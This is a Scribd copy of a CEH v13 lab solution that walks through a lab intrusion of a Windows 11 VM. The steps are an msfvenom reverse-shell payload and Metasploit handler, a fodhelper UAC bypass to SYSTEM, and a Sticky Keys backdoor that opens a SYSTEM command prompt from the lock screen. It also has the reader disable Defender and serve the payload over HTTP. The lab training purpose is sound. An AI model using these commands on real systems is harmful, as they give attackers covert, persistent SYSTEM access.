Scribd
Upload
23 views

Lab2_Task1_StickyKeys_Solution

This document outlines the steps to escalate privileges on a Windows 11 machine by bypassing User Account Control (UAC) and exploiting the Sticky Keys feature using a Metasploit payload. The procedure includes setting up an attacker machine, generating a payload, executing it on the target machine, and establishing persistent SYSTEM-level access. The final steps involve testing the exploit and cleaning up the environment after successful privilege escalation.

Uploaded by

tch.mustafasmadi
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
23 views

Lab2_Task1_StickyKeys_Solution

This document outlines the steps to escalate privileges on a Windows 11 machine by bypassing User Account Control (UAC) and exploiting the Sticky Keys feature using a Metasploit payload. The procedure includes setting up an attacker machine, generating a payload, executing it on the target machine, and establishing persistent SYSTEM-level access. The final steps involve testing the exploit and cleaning up the environment after successful privilege escalation.

Uploaded by

tch.mustafasmadi
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 12

Lab Solution: Module 6, Lab 2, Task 1 -

Escalate Privileges by Bypassing UAC and


Exploiting Sticky Keys

Introduction
This document details the steps to complete Task 1 of Lab 2 from Module 06 (System
Hacking) of the CEH v13 Lab Manual. The objective is to gain initial access to a Windows
11 machine using a Metasploit payload, bypass User Account Control (UAC) to gain
SYSTEM privileges, and then exploit the Sticky Keys accessibility feature to establish
persistent SYSTEM-level access even from the lock screen.

Lab Environment
• Attacker Machine: Parrot Security VM (IP: 10.10.1.13 - Example from Manual)
• Target Machine: Windows 11 VM
• Credentials: Parrot (attacker/toor), Windows Admin (CEH/Pa$$w0rd), Windows
User (Martin/apple)

Procedure

Step 1: Initial Setup

Ensure both the Parrot Security and Windows 11 virtual machines are powered on and
networked correctly. Log in to the Parrot Security VM using the provided credentials
(attacker/toor).

Step 2: Generate Payload

Open a terminal window on the Parrot Security machine. Elevate privileges to root using
sudo su (password: toor) and navigate to the root directory using cd . Generate the
initial Meterpreter payload using msfvenom . This executable will be used to establish
the first connection to the target machine.
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.1.13
lport=444 -f exe > /home/attacker/Desktop/windows.exe

(Note: Replace 10.10.1.13 with the actual IP address of your Parrot Security VM. The
output path /home/attacker/Desktop/windows.exe assumes the user is 'attacker';
adjust if necessary.)

Step 3: Setup Metasploit Handler

Launch the Metasploit Framework console by typing msfconsole in the terminal.


Configure a listener (handler) to receive the incoming connection from the payload once
it's executed on the target machine.
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.10.1.13
set lport 444
exploit -j -z

This starts the listener in the background ( -j ) without waiting for a connection
immediately ( -z ).

Step 4: Target Machine Preparation and Payload Execution

Switch to the Windows 11 VM and log in as the Administrator (CEH/Pa$$w0rd). Before


transferring and running the payload, it's often necessary to disable antivirus software,
such as Windows Defender's real-time protection, to prevent the payload from being
detected and removed.

Navigate to Windows Security settings -> Virus & threat protection -> Manage settings,
and toggle Real-time protection off.

Transfer the generated windows.exe file from the Parrot VM's Desktop to the Windows
11 VM. This can be done via various methods like setting up a simple web server on
Parrot ( python3 -m http.server 80 in the Desktop directory) and downloading
from the Windows browser, using shared folders, USB drives, etc. Once transferred,
double-click and run the windows.exe file on the Windows 11 machine.

Step 5: Establish Initial Meterpreter Session

Switch back to the Parrot Security VM's Metasploit console. A message indicating a new
Meterpreter session has opened should appear shortly after the payload is executed on
the target.

List the active sessions using sessions . Interact with the newly opened session
(assuming it's ID 1) using sessions -i 1 .
Verify the user context of the current session by typing getuid . This should display the
username under which the payload was executed (e.g., WINDOWS11\Admin ).
Step 6: Bypass UAC

To gain higher privileges, background the current Meterpreter session using the
background command. Search for and use a UAC bypass exploit module. The
bypassuac_fodhelper module is commonly used.

use exploit/windows/local/bypassuac_fodhelper
show options
set SESSION 1
set payload windows/x64/meterpreter/reverse_tcp
show options
set LHOST 10.10.1.13
set LPORT 4444
exploit
(Note: We set a different payload architecture (x64) and LPORT (4444) for the elevated
session as per the lab manual's example. Ensure the LHOST matches your Parrot VM's
IP.)

Step 7: Gain SYSTEM Privileges

A successful UAC bypass will create a new Meterpreter session. List sessions again
( sessions ) and interact with the new session (e.g., sessions -i 2 ). Verify the
privilege level by running getuid . The output should now be NT
AUTHORITY\SYSTEM , indicating the highest level of privilege.
Step 8: Exploit Sticky Keys for Persistence

Background the SYSTEM-level Meterpreter session ( background ). Use the Sticky Keys
post-exploitation module to replace the Sticky Keys executable ( sethc.exe ) with a
command prompt ( cmd.exe ). This allows launching a SYSTEM command prompt from
the login/lock screen by pressing the Shift key five times.

use post/windows/manage/sticky_keys
show options
set SESSION 2
exploit
Step 9: Test Sticky Keys Exploit

Switch back to the Windows 11 VM. Sign out of the Admin account. Log in as the non-
privileged user 'Martin' (password: apple). Lock the screen (Windows Key + L).

From the lock screen, press the Shift key five times consecutively. Instead of the usual
Sticky Keys prompt, a Command Prompt window should appear.
Inside this command prompt, type whoami and press Enter. The output should confirm
that the command prompt is running as nt authority\system .
Step 10: Conclusion and Cleanup

You have successfully escalated privileges from an administrator account to SYSTEM and
then exploited Sticky Keys to gain persistent SYSTEM-level access from the lock screen,
even when logged in as a non-privileged user. Document all findings and acquired
information. Close all open windows and Meterpreter sessions. Finally, shut down both
the Windows 11 and Parrot Security virtual machines.

(Optional Cleanup: To restore Sticky Keys functionality, you would typically run the
sticky_keys module again with the ACTION option set to CLEANUP from the
SYSTEM Meterpreter session before shutting down.)

Note: Due to limitations in generating images depicting specific exploit commands or


outputs, generic placeholder images representing the relevant interfaces (terminal,
Metasploit console, Windows prompts) are used below. The descriptions accurately
reflect the expected content of each screenshot.

You might also like